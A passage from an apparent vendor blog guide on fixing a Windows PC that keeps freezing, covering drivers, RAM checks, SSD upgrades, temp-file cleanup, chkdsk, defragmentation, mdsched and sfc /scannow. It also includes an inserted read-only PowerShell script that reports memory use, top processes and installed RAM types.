      Drivers directly affect the performance of your PC and can cause the computer to freeze constantly. If device drivers are corrupt or outdated, applications cannot interact properly with your hardware. Most modern operating systems get drivers from Windows Update after installation, but the drivers there are rarely up to date. This is especially true of graphics adapter drivers. For example, if your PC has powerful hardware but performs poorly in graphics applications, we recommend downloading and installing the latest video driver from the manufacturer’s website. In most cases this will fix poor performance in applications and the PC freezing for a few seconds.

      Computer Keep Freezing? Lack of RAM!

      Lack of memory is often the cause of occasional freezes. Unfortunately, you cannot solve this issue programmatically, though you can try increasing the size of the paging file. The easiest way to check for faulty RAM is to run the Windows Memory Diagnostic. Below are the steps to check your RAM:

      1. Open the Start menu and type in Windows Memory Diagnostic Tool in the search box.
        Windows memdiag
      2. Click on it. This will reboot your system and check out your memory. It will also notify you if it finds any problems.
        Memdiag restart PC

      If no errors are found, there is probably nothing wrong with the memory itself. Most likely, your system and applications simply don’t have enough RAM. Consider upgrading your PC, or at the very least try adding RAM. You can find out whether your system has enough RAM by opening Task Manager and going to the Performance tab. If more than 70% of your device’s RAM is in use, you should add RAM.

      If you have a desktop PC, this is as simple as it gets. You just need to find out what type of memory is installed. To do this, open Task Manager, go to the Performance tab, and click Memory.

      Task Manager RAM type
      Usually, the type of memory installed is displayed here, but sometimes it is not.

      If your memory type is not displayed there, use special utilities, such as AIDA64.

      AIDA64 RAM info
      AIDA64 interface.

      If you have a laptop, google your model to find out which RAM it uses. However, not all laptops allow you to expand the RAM: in compact models the memory is soldered onto the motherboard and is physically impossible to replace.
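The same Task Manager checks, the memory-usage figure with the 70% rule from this section, the resource-hungry background processes named under "Check for Running Resource-Intensive Software", and the installed memory type that Task Manager sometimes leaves blank, can be read from PowerShell. This is an added example, not code from the Gridinsoft post; it assumes Windows 10/11 with PowerShell 5.1 or later, and the SMBIOS type-code table in it is an assumption taken from the SMBIOS specification, not from the article.

```powershell
# Added example (not from the Gridinsoft post). Read-only memory checks.
# Assumes Windows 10/11 and PowerShell 5.1 or later.

# SMBIOS memory type codes (Win32_PhysicalMemory.SMBIOSMemoryType), taken from
# the SMBIOS specification; any other value is reported as the raw number.
$SmbiosMemoryType = @{ 20 = 'DDR'; 21 = 'DDR2'; 24 = 'DDR3'; 26 = 'DDR4'; 34 = 'DDR5' }

# Process names the article tells you to look for: VM hosts that sit idle in
# the background while holding a lot of CPU and memory.
$VmHostPatterns = @('Vmmem*', 'VirtualBox*', 'Vmware-vmx*')

function Get-MemoryPressure {
    # Same numbers as Task Manager's Performance tab, with the 70% rule applied.
    $os      = Get-CimInstance -ClassName Win32_OperatingSystem
    $totalMB = [math]::Round($os.TotalVisibleMemorySize / 1KB)   # reported in KB
    $freeMB  = [math]::Round($os.FreePhysicalMemory / 1KB)
    $usedPct = [math]::Round(100 * ($totalMB - $freeMB) / $totalMB, 1)
    [PSCustomObject]@{
        TotalMB = $totalMB
        UsedMB  = $totalMB - $freeMB
        UsedPct = $usedPct
        AddRAM  = $usedPct -gt 70      # the article's threshold for adding RAM
    }
}

function Get-TopMemoryProcesses {
    # Biggest working sets first, flagging the VM host processes by name.
    param([int]$Count = 10)
    Get-Process |
        Sort-Object WorkingSet64 -Descending |
        Select-Object -First $Count -Property Name, Id,
            @{ n = 'WorkingSetMB'; e = { [math]::Round($_.WorkingSet64 / 1MB) } },
            @{ n = 'CpuSeconds';   e = { if ($_.CPU) { [math]::Round($_.CPU, 1) } else { 0 } } },
            @{ n = 'VmHost';       e = { $n = $_.Name; @($VmHostPatterns | Where-Object { $n -like $_ }).Count -gt 0 } }
}

function Get-InstalledMemoryModules {
    # What Task Manager sometimes leaves blank: per-DIMM type, size and speed.
    Get-CimInstance -ClassName Win32_PhysicalMemory |
        Select-Object DeviceLocator, Manufacturer, PartNumber,
            @{ n = 'CapacityGB'; e = { [math]::Round($_.Capacity / 1GB) } },
            @{ n = 'SpeedMTs';   e = { $_.Speed } },
            @{ n = 'Type';       e = {
                $t = [int]$_.SMBIOSMemoryType
                if ($SmbiosMemoryType.ContainsKey($t)) { $SmbiosMemoryType[$t] } else { "SMBIOS type $t" }
            } }
}

Get-MemoryPressure          | Format-List
Get-TopMemoryProcesses      | Format-Table -AutoSize
Get-InstalledMemoryModules  | Format-Table -AutoSize
```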

      Hardware issues that lead to the computer freezing

      A more severe problem is a hardware issue, where a particular computer component is not working correctly or is malfunctioning. This can happen for several reasons, such as overheating or excessive dust buildup on components inside the computer. Trivial as it sounds, a mouse or keyboard cord can become damaged over time, and a wireless device can have a dead battery. For the past few years, all computers have been equipped with high-speed SSDs, but older machines still have obsolete hard disk drives.

      If your device has an older hard drive, we recommend replacing it with a faster SSD. This is guaranteed to give your PC a significant performance boost. Although SSDs, used correctly, last quite a long time without problems, keep in mind that when an SSD fails, it stops working completely.

      How to Fix Computer Keeps Freezing

      Are you facing the problem of a computer that keeps freezing randomly? In addition to the tips above, you can apply the following techniques to minimize the risk of frequent freezes:

      Method #1. Clean up Windows Temporary Files

      Microsoft Windows uses a cache to store temporary files so it can access them quickly. Besides taking up extra space, these files can also interfere with Windows and cause performance issues. Clearing the cache folder removes unneeded files created in the past that may have caused your OS to hang. To clear the Windows cache files, follow these steps:

      1. Press Win+R and type or paste “%temp%” in the Run window to open the temporary files folder.
        Temp folder opening
      2. Select all the files with Ctrl+A and delete them permanently. You can also use the Disk Cleanup tool: click Start and type “disk cleanup” in the search box.
        Disk cleanup search
      3. In the window that opens, select the drive where the OS is installed (by default, drive C). Then choose the types of data you want to delete in the next window. If you have very little free space, you can select all of them.
        Disk cleanup file types

      Method #2. Check The Disk For Malfunctions

      If the hard drive’s response time is not up to standard, Windows may not be able to access it at the necessary rate, and the system freezes between access intervals. In addition, fragmentation errors may occur on the hard drive after a PC crash or abnormal shutdown. Windows has a built-in tool to identify and fix disk problems, and running it is another step that helps when the computer hangs again and again. To do this, follow these steps:

      1. Right-click Start and select Terminal (Administrator).
        Terminal as administrator
      2. Type or paste “chkdsk” at the command prompt and press Enter.
        Chkdsk command prompt

      This starts checking your hard drive for errors from the Windows command line. Sometimes Windows needs to reboot to complete the check. When the utility finishes, it reports any disk errors it found.

      Method #3. Run Defragmentation

      Defragmentation reorganizes the data stored on your hard drive so that the pieces of each file line up contiguously. It picks up all the fragments scattered across your HDD and puts them back together in an orderly, neat, and clean fashion. To do so:

      1. Open My Computer.
      2. Right-click the desired drive and choose Properties.
        Disk drives list
      3. Click the Tools tab.
      4. Click Optimize.
        Disk defrag
      5. When the window appears, click Optimize.
        Optimize drives

      As a result, defragmentation increases your computer’s performance by reducing the time it takes to access data and allows you to use your storage more efficiently.

      Method #4. Run Memory Check

      If you suspect your computer has memory problems, you can run the Windows Memory Diagnostics utility by completing the following steps:

      1. Press Windows + R key combinations and type mdsched.exe in the input box. Then press Enter.
      2. Click Restart now and check for problems (recommended) to check for problems immediately (If you want to check later, click “Check for problems the next time I start my computer”).
      3. Windows will restart and show a window with the progress of the check and the number of passes it will run on memory. It might take several minutes for the tool to finish.

      Method #5. Run System File Checker

      Sometimes a computer keeps freezing randomly due to corrupted or missing system files. Fortunately, the OS includes the System File Checker, which can restore the original files. With any luck, it will fix your problem automatically. To use this tool, run the command line as administrator and type or paste the following command:

      sfc /scannow

      Command prompt search

      Windows will scan its files, and if it finds a corrupt or missing file, Windows will try to fix it automatically.

      Command prompt sfc scannow

      No matter how well you maintain your PC, all systems hang at some point. This can also be caused by operating system updates, as seen with some recent Windows 10 updates. For example, the October 2023 update, KB5031356, had significant installation issues due to the 0x8007000d error, which prevented the update from completing and led to other problems such as slow performance and reboot loops.

      However, understanding what causes your computer to hang helps you prevent and troubleshoot problems in the future. We hope the methods described above have helped you solve the Windows freeze problem so you can get back to using your device comfortably. If none of the above solutions helped, your PC likely has a hardware problem that requires further investigation. In that case, contact a service center, where qualified specialists will be able to find and fix the problem.
